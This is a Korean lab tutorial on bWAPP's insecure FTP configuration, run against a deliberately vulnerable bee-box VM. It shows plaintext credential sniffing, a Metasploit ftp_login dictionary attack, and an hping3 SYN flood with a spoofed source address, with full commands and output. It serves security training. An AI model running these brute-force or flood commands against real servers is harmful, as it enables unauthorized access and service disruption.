웹 해킹 bWAPP - 71. A5 - Security Misconfiguration - Insecure FTP Configuration
본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
1. Security Misconfiguration
- OWASP Top10 A5 - 잘못된 보안 구성
- 서버/시스템/DB/네트워크 장비/웹 설정 요류로 인하여 발생하는 취약점이다.
- Ex) 디렉토리 리스팅, 에러페이지, 웹페이지 주석, 웹서버 기본 설정, Adobe Flash 취약점, DoS/DDos 공격,
특정 서비스에 대한 Reverse_TCP 공격, 로컬 권한 취약점, 백업/임시/robots 파일
2. Insecure FTP Configuration
- FTP 서버 연결시 전송되는 아이디/패스워드가 평문으로 전송되기 때문에 MITM에 의한 아이디/패스워드 노출이 쉽게 일어난다.
- 블루트 포스/사전 대입 공격을 통해서도 아이디/패스워드 크랙에 취약하다.
- TCP Syn 플러딩 공격에 의해서 서버 네트워크 대역폭 고갈 및 부하 현상이 발생한다.
3. Security Misconfiguration - Insecure FTP Configuration
- 이 시나리오는 FTP 평문 메세지 취약점 확인, 사전대입 공격, DoS 공격을 진행하는 내용이다.
Ex1) Security Misconfiguration - Insecure FTP Configuration 이해 I
보안 레벨 선택 및 시나리오 선택
Hint : FTP 파손이 가능하다...
Kali에서 FTP 패케지 설치 실시
|
root@kali:~# apt-get install ftp
패키지 목록을 읽는 중입니다... 완료
의존성 트리를 만드는 중입니다
상태 정보를 읽는 중입니다... 완료
다음 패키지가 자동으로 설치되었지만 더 이상 필요하지 않습니다:
libtxc-dxtn-s2tc multiarch-support
Use 'apt autoremove' to remove them.
다음 새 패키지를 설치할 것입니다:
ftp
0개 업그레이드, 1개 새로 설치, 0개 제거 및 1508개 업그레이드 안 함.
58.7 k바이트 아카이브를 받아야 합니다.
이 작업 후 135 k바이트의 디스크 공간을 더 사용하게 됩니다.
받기:1 http://ftp.harukasan.org/kali kali-rolling/main amd64 ftp amd64 0.17-34 [58.7 kB]
내려받기 58.7 k바이트, 소요시간 1초 (62.5 k바이트/초)
Selecting previously unselected package ftp.
(데이터베이스 읽는중 ...현재 324157개의 파일과 디렉터리가 설치되어 있습니다.)
Preparing to unpack .../archives/ftp_0.17-34_amd64.deb ...
Unpacking ftp (0.17-34) ...
ftp (0.17-34) 설정하는 중입니다 ...
update-alternatives: using /usr/bin/netkit-ftp to provide /usr/bin/ftp (ftp) in auto mode
Processing triggers for man-db (2.7.6.1-4) ...
root@kali:~# |
bWAPP을 타겟으로 스캐닝 실시
|
root@kali:~# nmap -sS -sV 192.168.20.205
Starting Nmap 7.60 ( https://nmap.org ) at 2019-02-15 19:46 KST
Nmap scan report for 192.168.20.205
Host is up (0.00016s latency).
Not shown: 983 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: ITSECGAMES)
443/tcp open ssl/http Apache httpd 2.2.8 ((Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: ITSECGAMES)
512/tcp open exec?
513/tcp open login?
514/tcp open shell?
666/tcp open doom?
3306/tcp open mysql?
5901/tcp open vnc VNC (protocol 3.8)
6001/tcp open X11 (access denied)
8080/tcp open http nginx 1.4.0
8443/tcp open ssl/http nginx 1.4.0
9080/tcp open http lighttpd 1.4.19 |
와이어샤크 실행 및 eth1 캡처 실시
bWAPP FTP 서버 접속 및 종료 실시
|
root@kali:~# ftp 192.168.20.205
Connected to 192.168.20.205.
220 ProFTPD 1.3.1 Server (bee-box) [192.168.20.205]
Name (192.168.20.205:root): bee
331 Password required for bee
Password: bug
230 User bee logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quit
221 Goodbye.
root@kali:~# |
와이어샤크 캡처 내용 확인(ID/PASSWORD 확인 가능)
Ex2) Security Misconfiguration - Insecure FTP Configuration 이해 II
사전 대입 파일 생성 실시
root@kali:~# vi user.txt
|
bee
admin
administrator
root
:wq! |
root@kali:~# vi pass.txt
메타스플로잇을 이용한 사전 대입 공격 실시
|
root@kali:~# msfconsole -q
msf > search auxiliary/scanner/ftp/ftp_login
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/ftp/ftp_login normal FTP Authentication Scanner
msf > use auxiliary/scanner/ftp/ftp_login
msf auxiliary(scanner/ftp/ftp_login) >
msf auxiliary(scanner/ftp/ftp_login) > set rhosts 192.168.20.205
rhosts => 192.168.20.205
msf auxiliary(scanner/ftp/ftp_login) > set user_file /root/user.txt
user_file => /root/user.txt
msf auxiliary(scanner/ftp/ftp_login) > set pass_file /root/pass.txt
pass_file => /root/pass.txt
msf auxiliary(scanner/ftp/ftp_login) > set stop_on_success true
stop_on_success => true
msf auxiliary(scanner/ftp/ftp_login) > exploit
[*] 192.168.20.205:21 - 192.168.20.205:21 - Starting FTP login sweep
[!] 192.168.20.205:21 - No active DB -- Credential data will not be saved!
[+] 192.168.20.205:21 - 192.168.20.205:21 - Login Successful: bee:bug
[*] 192.168.20.205:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ftp/ftp_login) >
msf auxiliary(scanner/ftp/ftp_login) > quit
root@kali:~# |
Ex3) Security Misconfiguration - Insecure FTP Configuration 이해 III
bee@bee-box:~$ gnome-system-monitor &
[1] 4342
bWAPP에서 시스템 모니터링 도구 실행 실시
TCP SYN 플러딩 공격 실시
|
root@kali:~# hping3 -S 192.168.20.205 -p 21 -a 1.2.3.4 --flood
HPING 192.168.20.205 (eth1 192.168.20.205): S set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown
(Ctrl+C)
--- 192.168.20.205 hping statistic ---
1327775 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@kali:~#
|
BWAPP 부하 발생 확인
[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)
웹해킹 71. A5 - bWAPP Security Misconfiguration - Insecure FTP Configuration https://youtu.be/33Q4QvDoAU4
